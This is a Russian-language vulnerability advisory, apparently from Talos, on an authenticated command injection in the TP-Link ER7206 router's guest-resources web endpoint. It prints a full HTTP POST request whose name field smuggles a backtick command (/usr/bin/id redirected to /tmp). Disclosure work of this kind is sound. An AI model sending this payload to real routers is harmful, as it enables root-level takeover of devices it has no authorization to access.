
TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy — уязвимость внедрения команд
TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy — уязвимость внедрения команд
Уязвимость выполнения команд существует в функциональности гостевых ресурсов маршрутизатора Tp-Link ER7206 Omada Gigabit VPN Router версии 1.3.0 build 20230322 Rel.70591. Специально сформированный HTTP-запрос может привести к выполнению произвольных команд. Злоумышленник может отправить аутентифицированный HTTP-запрос для эксплуатации этой уязвимости.
Перечисленные ниже версии были протестированы или проверены на уязвимость компанией Talos либо подтверждены производителем как уязвимые.
Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591
ER7206 Omada Gigabit VPN Router — это высокопроизводительное сетевое решение, которое поддерживает гигабитные подключения, высокозащищённый VPN и интеграцию с Omada SDN для централизованного облачного управления и автоматической настройки без участия оператора (zero-touch provisioning).
Маршрутизатор ER7206 Omada Gigabit VPN Router запускает различные службы для управления маршрутизатором или подключёнными к нему устройствами. Одной из таких служб является , работающая на портах 80/443. Она предоставляет пользователям веб-интерфейс для настройки и управления маршрутизатором. По умолчанию служба выполняется с правами root. Используя эту службу, злоумышленник может получить root-доступ к устройству.
uhttpdУязвимость внедрения команд существует в службе uhttpd при добавлении гостевого ресурса на устройство. В веб-интерфейсе страницу гостевых ресурсов можно открыть, перейдя в Authentication -> Authentication Settings -> Guest Resources. Она содержит функции добавления, редактирования и удаления гостевых ресурсов. При добавлении гостевого ресурса отправляется следующий HTTP POST-запрос:
POST /cgi-bin/luci/;stok=b53d9dc12fe8aa66f4fdc273e6eaa534/admin/freeStrategy?form=strategy_list HTTP/1.1
Host: 192.168.8.100
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: sysauth=8701fa9dc1908978bc804e7d08931706
Content-Length: 470
data=%7B%22method%22%3A%22add%22%2C%22params%22%3A%7B%22index%22%3A0%2C%22old%22%3A%22add%22%2C%22new%22%3A%7B%22name%22%3A%22DDDDL|%60/usr/bin/id%3E/tmp/had%60%22%2C%22strategy_type%22%3A%22five_tuple%22%2C%22src_ipset%22%3A%22%2F%22%2C%22dst_ipset%22%3A%22%2F%22%2C%22mac%22%3A%22%22%2C%22sport%22%3A%22-%22%2C%22dport%22%3A%22-%22%2C%22service_type%22%3A%22TCP%22%2C%22zone%22%3A%22LAN1%22%2C%22comment%22%3A%22%22%2C%22enable%22%3A%22on%22%7D%2C%22key%22%3A%22add%22%7D%7D